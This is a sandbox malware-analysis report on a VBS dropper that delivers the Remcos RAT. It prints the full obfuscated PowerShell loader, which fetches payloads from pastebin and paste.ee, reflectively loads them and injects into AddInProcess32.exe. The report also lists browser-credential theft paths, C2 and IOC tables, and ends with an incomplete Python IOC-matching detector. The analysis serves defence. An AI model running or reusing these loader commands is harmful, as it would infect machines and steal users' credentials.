?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??cw?6?c8?lwbw?ge?cwb0?gu?ygbp?g4?lgbj?g8?bq?v?hi?yqb3?c8?sg?2?hu?ugbq?fo?cgb2?cc?i??7?cq?zg?g?d0?i??o?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?ck?i??7?ek?bgb2?g8?awbl?c0?vwbl?gi?ugbl?he?dqbl?hm?d??g?c0?vqbs?ek?i??k?em?qwbs?gg?bq?g?c0?twb1?hq?rgbp?gw?zq?g?cq?zg?g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?c?bv?hc?zqby?hm?a?bl?gw?b??u?gu?e?bl?c??lqbj?g8?bqbt?ge?bgbk?c??ew?k?gy?i??9?c??k?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??x?c4?d?b4?hq?jw?p?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?sqbu?hy?bwbr?gu?lqbx?gu?ygbs?gu?cqb1?gu?cwb0?c??lqbv?fi?sq?g?cq?uqbq?hq?yqb2?c??lqbp?hu?d?bg?gk?b?bl?c??j?bm?c??lqbv?hm?zqbc?ge?cwbp?gm?u?bh?hi?cwbp?g4?zwb9?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?j?bq?gq?ygbm?gs?i??9?c??jw?w?cc?i??7?cq?zqb2?g8?bqbu?c??pq?g?cc?jqbk?gs?uqbh?hm?r?bm?gc?cgbu?gc?jq?n?c??owbb?ei?eqb0?gu?wwbd?f0?i??k?gq?d?b2?gu?yg?g?d0?i?bb?hm?eqbz?hq?zqbt?c4?qwbv?g4?dgbl?hi?d?bd?do?ogbg?hi?bwbt?ei?yqbz?gu?ng?0?fm?d?by?gk?bgbn?cg?i??k?fe?u?b0?ge?dg?u?hi?zqbw?gw?yqbj?gu?k??n?cq?j??n?cw?jwbb?cc?kq?g?ck?i??7?fs?uwb5?hm?d?bl?g0?lgbb?h??c?be?g8?bqbh?gk?bgbd?do?ogbd?hu?cgby?gu?bgb0?eq?bwbt?ge?aqbu?c4?t?bv?ge?z??o?cq?z?b0?hy?zqbi?ck?lgbh?gu?d?bu?hk?c?bl?cg?jwbu?gu?a
?b1?gw?ywbo?gu?cwby?hg?w?b4?hg?lgbd?gw?yqbz?hm?mq?n?ck?lgbh?gu?d?bn?gu?d?bo?g8?z??o?cc?tqbz?he?qgbj?gi?wq?n?ck?lgbj?g4?dgbv?gs?zq?o?cq?bgb1?gw?b??s?c??wwbv?gi?agbl?gm?d?bb?f0?xq?g?cg?jw?w?c8?zg?y?gs?cgbs?c8?z??v?gu?zq?u?gu?d?bz?ge?c??v?c8?ogbz?h??d?b0?gg?jw?g?cw?i??k?gu?dgbv?g0?bg?g?cw?i??n?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xw?t?c0?lq?t?c0?lq?t?cc?l??g?cq?agbk?gi?zgbr?cw?i??n?de?jw?s?c??jwbs?g8?z?bh?cc?i??p?ck?ow?=';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.replace('%jkqasdfgrtg%', 'c:\users\user\desktop\asegurar.vbs');powershell $yolopolhggobek;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'https://pastebin.com/raw/j6urjzrv' ;$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;invoke-webrequest -uri $ccrhm -outfile $f -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;$qptav = ( get-content -path $f ) ;invoke-webrequest -uri $qptav -outfile $f -usebasicparsing} ;$qptav = ( get-content -path $f ) ;$jdbfk = '0' ;$evomn = 'c:\users\user\desktop\asegurar.vbs' ;[byte[]] $dtveb = [system.convert]::frombase64string( $qptav.replace('$$','a') ) ;[system.appdomain]::currentdomain.load($dtveb).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('0/f2krr/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'roda' ));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand jabmacaapqagacgawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accakqagadsajabrafaadabhahyaiaa9acaakaagaecazqb0ac0aqwbvag4adablag4adaagac0auabhahqaaaagacqazgagackaiaa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbsaekaiaakafeauab0ageadgagac0atwb1ahqargbpagwazqagacqazgagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagca -inputformat xml -outputformat text
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerJ0\001
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerJ0\001Op
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerd
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerJ0\GB
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerJ0\
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerns.org:20014p
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managers|
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerJ0\001?ptK
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerJ0\8
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, logs.dat.8.dr | Binary or memory string: [Program Manager]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00434CB6 cpuid 8_2_00434CB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: GetLocaleInfoA, 8_2_0040F90C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: EnumSystemLocalesW, 8_2_0045201B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: EnumSystemLocalesW, 8_2_004520B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 8_2_00452143
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: GetLocaleInfoW, 8_2_00452393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: EnumSystemLocalesW, 8_2_00448484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_004524BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: GetLocaleInfoW, 8_2_004525C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_00452690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: GetLocaleInfoW, 8_2_0044896D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 8_2_00451D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: EnumSystemLocalesW, 8_2_00451FD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00404F51 GetLocalTime,CreateEventA,CreateThread,8_2_00404F51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041B69E GetComputerNameExW,GetUserNameW,8_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0044942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,8_2_0044942D
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match, File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR
Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040BA4D references \AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040BB6B references \AppData\Roaming\Mozilla\Firefox\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040BB6B references \key3.db

Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-T0UVJ0
Source: Yara match, File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR
Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040569A references cmd.exe
MITRE ATT&CK Matrix

Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.

Techniques marked with a count in the matrix for this sample: Scripting, Native API, DLL Side-Loading, Deobfuscate/Decode Files or Information, OS Credential Dumping, System Time Discovery, Archive Collected Data, Web Service, System Shutdown/Reboot, Exploitation for Client Execution, Bypass User Account Control, Obfuscated Files or Information, Input Capture, Account Discovery, Ingress Tool Transfer, Defacement, Command and Scripting Interpreter, Windows Service, Access Token Manipulation, Software Packing, Credentials In Files, System Service Discovery, Clipboard Data, Encrypted Channel, Service Execution, File and Directory Discovery, Non-Standard Port, PowerShell, Process Injection, System Information Discovery, Remote Access Software, Masquerading, Security Software Discovery, Non-Application Layer Protocol, Virtualization/Sandbox Evasion, Application Layer Protocol, Process Discovery, Application Window Discovery, System Owner/User Discovery, Remote System Discovery, System Network Configuration Discovery.

Behavior graph legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet
Behavior Graph ID: 1545852, Sample: asegurar.vbs, Start date: 31/10/2024, Architecture: WINDOWS, Score: 100

Start (root node)
  DNS/IP: sost.duckdns.org (Uses dynamic DNS services); pastebin.com (Connects to a pastebin service (likely for C&C)); 2 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures
  Starts: wscript.exe

wscript.exe
  Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
  Starts: powershell.exe

powershell.exe (first instance)
  Signatures: Suspicious powershell command line found; Encrypted powershell cmdline option found; Uses ping.exe to check the status of other devices and networks; Found suspicious powershell code related to unpacking or dynamic code loading
  Starts: powershell.exe; conhost.exe

powershell.exe (second instance)
  DNS/IP: pastebin.com 104.20.3.235, 443, 49730, 49732, CLOUDFLARENETUS, United States; paste.ee 188.114.97.3, 443, 49736, CLOUDFLARENETUS, European Union
  Signatures: Encrypted powershell cmdline option found; Writes to foreign memory regions; Potential dropper URLs found in powershell memory; Injects a PE file into a foreign processes
  Starts: AddInProcess32.exe; PING.EXE; powershell.exe; cmd.exe

AddInProcess32.exe
  DNS/IP: sost.duckdns.org 181.236.112.169, 2001, 49741, 49742, COLOMBIATELECOMUNICACIONESSAESPCO, Colombia
  Dropped file: C:\ProgramData\remcos\logs.dat (data)
  Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionalty to change the wallpaper; 5 other signatures

PING.EXE
  DNS/IP: 127.0.0.1, unknown, unknown

powershell.exe (third instance)
  DNS/IP: rentry.org 164.132.58.105, 443, 49731, 49733, OVHFR, France

Source | Detection | Scanner | Label
asegurar.vbs | 16% | ReversingLabs | Win32.Trojan.Honolulu

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
paste.ee | 1% | Virustotal | -
sost.duckdns.org | 0% | Virustotal | -
rentry.org | 0% | Virustotal | -
pastebin.com | 0% | Virustotal | -

Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore6 | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
paste.ee | 188.114.97.3 | true | true | - | unknown
sost.duckdns.org | 181.236.112.169 | true | true | - | unknown
rentry.org | 164.132.58.105 | true | false | - | unknown
pastebin.com | 104.20.3.235 | true | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://rentry.org/vsm4ofxs/raw | false | - | unknown
https://paste.ee/d/Rrk2f/0 | true | - | unknown
https://pastebin.com/raw/J6uRjZrv | true | - | unknown
https://rentry.org/shqm6g9p/raw | false | - | unknown
sost.duckdns.org | true | - | unknown
https://pastebin.com/raw/4B83LcVU | false | - | unknown
Name | Source (process whose memory contained the URL) | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe | false | URL Reputation: safe | unknown
http://paste.ee | powershell.exe | false | - | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe | false | - | unknown
https://go.micro | powershell.exe | false | URL Reputation: safe | unknown
https://rentry.org | powershell.exe | false | - | unknown
https://pastebin.com/raw | powershell.exe | true | - | unknown
https://rentry.org/shqm6g9p/rawP | powershell.exe | false | - | unknown
https://contoso.com/License | powershell.exe | false | URL Reputation: safe | unknown
https://www.google.com; | powershell.exe | true | - | unknown
https://contoso.com/Icon | powershell.exe | false | URL Reputation: safe | unknown
https://analytics.paste.ee | powershell.exe | true | - | unknown
https://paste.ee | powershell.exe | false | - | unknown
https://aka.ms/pscore6 | powershell.exe | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe | false | - | unknown
http://geoplugin.net/json.gp | AddInProcess32.exe | false | URL Reputation: safe | unknown
https://www.google.com | powershell.exe | true | - | unknown
http://rentry.org | powershell.exe | false | - | unknown
http://geoplugin.net/json.gp/C | powershell.exe, AddInProcess32.exe | false | URL Reputation: safe | unknown
HTTPS://PASTE.EE/D/RRK2F/0 | powershell.exe | false | - | unknown
https://contoso.com/ | powershell.exe | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe | false | URL Reputation: safe | unknown
https://rentry.org/vsm4ofxs/rawp | powershell.exe | false | - | unknown
https://analytics.paste.ee; | powershell.exe | true | - | unknown
https://cdnjs.cloudflare.com | powershell.exe | true | - | unknown
https://aka.ms/pscore68 | powershell.exe | false | URL Reputation: safe | unknown
https://cdnjs.cloudflare.com; | powershell.exe | true | - | unknown
http://www.apache.o | powershell.exe | false | - | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe | false | URL Reputation: safe | unknown
http://pastebin.com | powershell.exe | false | - | unknown
https://pastebin.com | powershell.exe | true | - | unknown
https://secure.gravatar.com | powershell.exe | true | - | unknown
https://themes.googleusercontent.com | powershell.exe | true | - | unknown
IP | Domain | Country | ASN | ASN name | Malicious
104.20.3.235 | pastebin.com | United States | 13335 | CLOUDFLARENET (US) | true
181.236.112.169 | sost.duckdns.org | Colombia | 3816 | COLOMBIATELECOMUNICACIONESSAESP (CO) | true
164.132.58.105 | rentry.org | France | 16276 | OVH (FR) | false
188.114.97.3 | paste.ee | European Union | 13335 | CLOUDFLARENET (US) | true

Before turning this table into block rules: 104.20.3.235 and 188.114.97.3 are Cloudflare edge addresses shared with many unrelated sites, so the usable indicators are the hostnames (pastebin.com, paste.ee) combined with the requesting process, not the IPs. sost.duckdns.org is a dynamic-DNS name, so 181.236.112.169 can change between runs; match on the name.

Loopback IP: 127.0.0.1
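The contacted-IP table above is this run's network IOC set: three paste services (pastebin.com, paste.ee, rentry.org) and one dynamic-DNS host flagged malicious. What follows is an added example, not part of the Joe Sandbox report and not Joe Security's code, showing how a detection engineer would turn that table into matching logic over process-to-destination telemetry. The IOC values are the ones in the table; the log line format and the log lines themselves are constructed for the example. It generalises in one place the report does not: any other label under duckdns.org contacted by a script host is raised as a medium-severity alert.

```python
"""Match process/DNS telemetry against the network IOCs in this report.

Added example; not part of the Joe Sandbox report or of Joe Security's tooling.
IOC values come from the contacted-IP table above. The log format and the
log lines are constructed for the example, not captured from a real host.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Command-and-control: the dynamic-DNS host the report flags malicious.
C2_HOSTS = {"sost.duckdns.org"}
C2_IPS = {"181.236.112.169"}

# Paste services used to stage the next script layer. Browsers reach these
# legitimately, so they are only an alert when a scripting host contacts them.
STAGING_HOSTS = {"pastebin.com", "paste.ee", "rentry.org"}
STAGING_IPS = {"104.20.3.235", "188.114.97.3", "164.132.58.105"}

# Dynamic-DNS provider behind the C2 host. Other labels under it are suspect
# when a script host talks to them (generalisation, not a report finding).
DYNDNS_SUFFIXES = {"duckdns.org"}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe",
                "pwsh.exe", "mshta.exe"}

# Hypothetical line format: "<timestamp> <process> <dst_host or -> <dst_ip>"
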